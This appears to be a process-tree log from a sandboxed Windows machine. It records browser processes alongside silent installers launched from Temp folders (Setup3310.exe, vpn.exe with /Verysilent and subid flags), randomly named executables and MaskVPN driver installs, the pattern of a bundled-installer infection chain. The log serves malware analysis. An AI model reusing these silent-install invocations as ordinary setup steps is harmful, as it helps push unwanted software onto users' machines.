C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:6736
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:4444
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4444.0.186162\351121441" -parentBuildID 20200403170909 -prefsHandle 1484 -prefMapHandle 1476 -prefsLen 1 -prefMapSize 219511 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4444 "\\.\pipe\gecko-crash-server-pipe.4444" 1584 gpu
    3⤵
    PID:9564
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4444.3.833289039\244425583" -childID 1 -isForBrowser -prefsHandle 2632 -prefMapHandle 2628 -prefsLen 599 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4444 "\\.\pipe\gecko-crash-server-pipe.4444" 1348 tab
    3⤵
    PID:4628
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4444.13.559985829\40685391" -childID 2 -isForBrowser -prefsHandle 3224 -prefMapHandle 3220 -prefsLen 1402 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4444 "\\.\pipe\gecko-crash-server-pipe.4444" 3236 tab
    3⤵
    PID:8100
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4444.20.1867465690\195172396" -childID 3 -isForBrowser -prefsHandle 3792 -prefMapHandle 3788 -prefsLen 7393 -prefMapSize 219511 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4444 "\\.\pipe\gecko-crash-server-pipe.4444" 3772 tab
    3⤵
    PID:7068
- - C:\Program Files\Mozilla Firefox\uninstall\helper.exe
    "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppUser
    3⤵
    PID:8048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:4700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe6e526e00,0x7ffe6e526e10,0x7ffe6e526e20
  2⤵
  PID:9036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1724 /prefetch:8
  2⤵
  PID:4588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
  2⤵
  PID:1456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2604 /prefetch:1
  2⤵
  PID:7592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
  2⤵
  PID:6744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:6616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:8896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:6912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
  2⤵
  PID:8792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1676 /prefetch:2
  2⤵
  PID:7896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4380 /prefetch:8
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4464 /prefetch:8
  2⤵
  PID:8992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4460 /prefetch:8
  2⤵
  PID:8824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:8
  2⤵
  PID:9980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:8
  2⤵
  PID:1796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4068 /prefetch:8
  2⤵
  PID:6356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1824 /prefetch:8
  2⤵
  PID:10052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3660 /prefetch:8
  2⤵
  PID:6364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3368 /prefetch:8
  2⤵
  PID:10140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1712 /prefetch:8
  2⤵
  PID:10020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6064 /prefetch:8
  2⤵
  PID:6000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=6108 /prefetch:2
  2⤵
  PID:10156
- C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
  "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
  2⤵
  PID:8952
- - C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
    "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff745197740,0x7ff745197750,0x7ff745197760
    3⤵
    PID:5844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:8
  2⤵
  PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6108 /prefetch:8
  2⤵
  PID:9144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:8
  2⤵
  PID:7912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  PID:11256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4736 /prefetch:8
  2⤵
  PID:4092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3892 /prefetch:8
  2⤵
  PID:5144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:8
  2⤵
  PID:10828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:8
  2⤵
  PID:11052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1932 /prefetch:8
  2⤵
  PID:5552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3644 /prefetch:8
  2⤵
  PID:3352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=160 /prefetch:8
  2⤵
  PID:8352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:8
  2⤵
  PID:2792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4052 /prefetch:8
  2⤵
  PID:10484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
  2⤵
  PID:4132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3352 /prefetch:8
  2⤵
  PID:4408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3112 /prefetch:8
  2⤵
  PID:6428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4812 /prefetch:8
  2⤵
  PID:7184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
  2⤵
  PID:10436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:8
  2⤵
  PID:3896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
  2⤵
  PID:3852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:8
  2⤵
  PID:9032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:8
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:8
  2⤵
  PID:3216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3212 /prefetch:8
  2⤵
  PID:8788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5588 /prefetch:8
  2⤵
  PID:4328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3236 /prefetch:8
  2⤵
  PID:3292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
  2⤵
  PID:8768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,10580299838857046817,8624603763787166492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4508 /prefetch:8
  2⤵
  PID:5672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffe6e526e00,0x7ffe6e526e10,0x7ffe6e526e20
1⤵
PID:4952

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:4900
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{09221028-786a-664f-be61-517be9b13a38}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:5804
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  PID:9672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe6e526e00,0x7ffe6e526e10,0x7ffe6e526e20
1⤵
PID:8844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:8100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1772306435357277002,17170144750154849378,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1596 /prefetch:8
  2⤵
  PID:9336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:7828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,18009680223387911031,10197397551359461899,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1600 /prefetch:8
  2⤵
  PID:4552

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\41e79155ff074c4dbb0f96b7748e6fef /t 7504 /p 7512
1⤵
PID:6508

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:10036

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:10080

C:\Users\Admin\AppData\Local\Temp\is-28M4M.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-28M4M.tmp\Setup3310.tmp" /SL5="$307FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\gfssno2sf2x\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:10060
- C:\Users\Admin\AppData\Local\Temp\is-4U1UQ.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-4U1UQ.tmp\Setup.exe" /Verysilent
  2⤵
  PID:9660

C:\Users\Admin\AppData\Local\Temp\is-4RP83.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4RP83.tmp\vpn.tmp" /SL5="$2087C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\pi0yfgs0ojg\vpn.exe" /silent /subid=482
1⤵
PID:3532

C:\Users\Admin\AppData\Local\Temp\F308.exe
C:\Users\Admin\AppData\Local\Temp\F308.exe
1⤵
PID:10200

C:\Users\Admin\AppData\Local\Temp\FF7D.exe
C:\Users\Admin\AppData\Local\Temp\FF7D.exe
1⤵
PID:9844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:8792

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:10020

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\95f1793ce5594b5f8a2e19dd810ee746 /t 2572 /p 2588
1⤵
PID:9252

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\9da7678887fb43afbcd61411ceaf5d54 /t 6972 /p 8792
1⤵
PID:10468

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:10660

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:3708

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:8792

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:10372
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:3792

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:4200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5196

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:10252

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
